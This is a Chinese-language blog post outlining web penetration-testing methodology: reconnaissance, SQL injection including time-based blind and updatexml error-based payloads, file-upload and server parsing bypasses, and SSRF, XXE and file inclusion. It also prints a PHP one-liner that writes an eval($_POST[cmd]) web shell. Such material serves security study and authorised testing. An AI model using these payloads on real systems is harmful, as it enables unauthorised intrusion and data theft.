夜间模式暗黑模式
字体
阴影
滤镜
圆角
主题色
渗透指南框架

渗透指南 BY:Ma4ter
1.信息收集
操作系统:
大小写敏感
数据库类型:
access mysql mssql Oracle postsql db2等等
端口服务对应 搭建组合推算
搭建平台(iis apache nginx tomcat等)
脚本程序(php asp aspx jsp cgi py等)
审查元素
第三方查询平台
搜索引擎
防护信息
超级ping
搭建架构(cms)
第三方插件
yunsee.cn
bugscan
cmsmap
非CMS小众程序或个人开发
CMS开源程序
多协议站点分析
分目录站点
分端口站点
分域名站点
旁站,c段

CDN获取真实IP
1.历史DNS记录查询
dnsdb.lo/zh-cn
x.threatbook.cn
toolbar.netcraft.com/site_report?url=
2.查询子域名
3.利用网站漏洞
XSS盲打,命令执行,SSRF
4.服务器合法服务主动连接
RSS,sendmail
5.使用国外主机解析域名
6.目标敏感文件
phpinfo
7.从cdn管理入手
社工- –
8.全网扫描
zmap

google hack

“”
AND ‘和
| ‘或
+

site:
inurl:
intitle:
cache:
site:www.xxx.xxx asp(php) //查脚本语言
site:192.168.1.* //查c段

管理员信息收集:
注册邮箱,地址,网站联系方式,姓名
域名whois
生成社工字典,后台路径

MYSQL注入
order by x 确定字段数
union select 1,2,3,x
获取数据库名:database()
获取数据库版本:version()
union select database(),version(),3,4
information_schema:mysql5.0以上自带 记录了所有数据库名,表名,列名
information_schema.tables 记录表名信息的表
information_schema.columns 记录列名信息的表
Table_name 表名
Column_name 列名
table_Schema 数据库名
数据库用户:user()
操作系统:@@version_compile_os
语句拼接注意单引号 可用and ‘1’=’1 或者用#有时用+屏蔽’

mysql语句:读取:select load_file(‘绝对路径’)
写入:select ‘内容’ into outfile ‘绝对路径’ (可用来getshell)
注意符号 及其编码
空格过滤使用两个空格或者空格和+号;
网站路径:报错 配置路径读取

mysql注入问题
防注入,手工问题等
魔术引号magic_quotes
安全函数 addslashes
编码转换为16进制可绕过或者宽字节注入

mysql跨库注入 条件(root权限)
select schema_name from information_schema.schemata //获取所有数据库名
select table_name from information_schema.tables where table_schema=xxx //获取指定数据库的表名
select Column_name from information_schema.columns where table_name=xxx //获取指定表名的列名
select username,password from 数据库名.表名 //获取指定数据
成功达到跨库注入

请求方式注入
POST登陆框注入 火狐postdata
HTTP头部注入 $_SERVER 记录http头的数组
COOKIE验证注入 抓包 头部信息加入cookie:

参数类型注入
数字,字符,搜索
数字型:select * from news where id=1
字符型:select * from news where username=’admin’
搜索型:select * from news where id like ‘%aaa%’
搜索型使用%和’闭合即可

普通注入和盲注的区别
普通注入:效率高,兼容性差
盲注:效率较低,兼容性强

盲注攻击
基于时间延迟注入(上)
sleep()
if(条件,ture,false)
and sleep(if((select database()=’hack’),0,5))
length可以获取长度 然后IF判断
mid(str,1,1) 截取
ord ascii编码

基于时间延迟注入(下)
获取表名长度
union select 1,2,3,sleep(if(length(table_name)=4,0,6)) from information_schema.tables where table_schema=database() limit 0,1

union select 1,2,3,sleep(if(mid(table_name,1,1)=’l’,0,6)) from information_schema.tables where table_schema=database() limit 0,1

mid(table_name,1,1)//第一个1控制位数

if(ord(mid(table_name,1,1))=127,0,5) //accii码的方法

获取列名
union select 1,2,3,sleep(if(length(column_name)=4,0,6)) from information_schema.tables where table_name=’liuyan’ limit 0,1

问题:获取第几个表明及列名

基于布尔逻辑注入
基于报错提示注入

Insert delete update limit注入
利用updatexml()获取数据or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) or
利用extractvalue()获取数据
利用name_const()获取数据
利用子查询注入获取数据

update:
用户注册,密码修改,信息删除

XSS
反射性,存储型

文件上传
无解析漏洞时,格式代码与文件格式必须一致
文件头验证GIF89a等等
文件类型验证mime
文件后缀验证
在文件后缀名后加上一个空格和一个小数点
特殊扩展名那一块还可以在文件名后面加字符串:: $DATA来绕过
增加多重后缀伪造后缀
00截断

编辑器上传漏洞利用
eweb,fck,ce,cfinder,ck等
1.获取编辑器名称及版本信息
扫描爬行 字典扫描 探针
观察图片地址或者编辑器特征
2.获取编辑器相关的漏洞
3.利用编辑器漏洞进行攻击测试

.htaccess 文件上传漏洞
<Files demo.jpg> ForceType application/x-httpd-php SetHandler application/x-httpd-php </Files>

文件解析漏洞

iis6.0的解析漏洞
iis6.0上有两个典型的解析漏洞:

1.在.asp/.asa结尾的文件夹里面的文件均按照asp文件进行解释。

2.iis在解析文件名时遇到分号停止。

1
例子:

./dir.asp/evil_code.txt //txt文件将被按照asp文件进行解析

evil_code.asp;1.jpg //该文件将被按照asp文件进行解析

1apache1.x 2.x中的解析漏洞
Apache在解析文件时,当遇到不认识的扩展名时,将会从后向前解析,直到碰到认识的为止,如果都不认识,将会暴露源码。

apache认识哪些扩展名,可以在apache安装目录下的“conf/mime.types”中查看。

例子:

1.php.rar //如果apache不认识rar文件,该文件将被按照php文件解释

PHP CGI解析漏洞(畸形解析漏洞)
常出现的版本:iis 7.0/7.5 Nginx<8.03

在php配置文件中有一个cgi.fi: x_pathinfo,当其开启时:

访问 www.victim.com/evil.jpg/1.php

1.php为不存在的文件,php将会向前解析,从而将evil.jpg(可以是图片一句话)按照php解释。

IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞

在默认Fast-CGI开启状况下,黑阔上传一个名字为xx.jpg,内容为

<?PHP fputs(fopen(‘shell.php’,’w’),'<?php eval($_POST[cmd])?>’);?>

的文件,然后访问xx.jpg/.php,在这个目录下就会生成一句话木马 shell.php
php别名:’php’, ‘php3’, ‘php4’, ‘php5’, ‘phtml’, ‘pht’

Apache版本在2.4.0到2.4.29(CVE-2017-15715)
上传一个包含换行符的文件
用hex功能在1.php后面添加一个\x0A
然后访问/1.php%0A,即可发现已经成功getshell:

文件包含
本地文件包含漏洞
include()
里面可以为jpg等格式
里面必须为可控变量
远程包含漏洞
php.ini安全设置allow_url_include
目录遍历漏洞
加密参数传递的数据
编码绕过
目录限定绕过 可以使用~等特殊符号绕过
绕过文件后缀过滤:%00截断
绕过来路验证:http referer

代码执行漏洞(菜刀原理)
命令执行漏洞

CSRF
跟XSS差不多,跨站请求
拓展:管理员正在后台登录并操作后台,这个时候访问了某网址,网址中带有一些后台操作的数据包,那么这时就会以管理员的权限去操作后台
SSRF
SSRF漏洞的寻找(漏洞常见出没位置):
1)分享:通过URL地址分享网页内容
2)转码服务
3)在线翻译
4)图片加载与下载:通过URL地址加载或下载图片
5)图片、文章收藏功能
6)未公开的api实现以及其他调用URL的功能
7)从URL关键字中寻找

share
wap
url
link
src
source
target
u
3g
display
sourceURl
imageURL
domain

SSRF漏洞的验证方法:

1)因为SSRF漏洞是构造服务器发送请求的安全漏洞,所以我们就可以通过抓包分析发送的请求是否是由服务器的发送的来判断是否存在SSRF漏洞
2)在页面源码中查找访问的资源地址 ,如果该资源地址类型为 http://www.xxx.com/a.php?image=(地址)的就可能存在SSRF漏洞
可以用来探测内网信息等等

变量覆盖导致注入
文件下载漏洞
down.php?file=../index.php

逻辑越权漏洞
越权访问数据文件
越权访问特定ID用户信息
接口枚举越权

订单金额任意修改
未进行登录凭证验证
cookie设计存在缺陷 iseacms

xml&xxe漏洞利用方式
simplexml_load_file($xml)
权限维持
修复方案
过滤提交的XML数据
不允许XML中含有自己定义的DTD

内网渗透
metasploit
cobaltstriks
nmap
powershell

本文章由Ma4ter原创 转载请留下出处

仅供技术参考 请勿做违反我国法律的事情 否则后果自负!

暂无评论

发送评论 编辑评论


				
上一篇
下一篇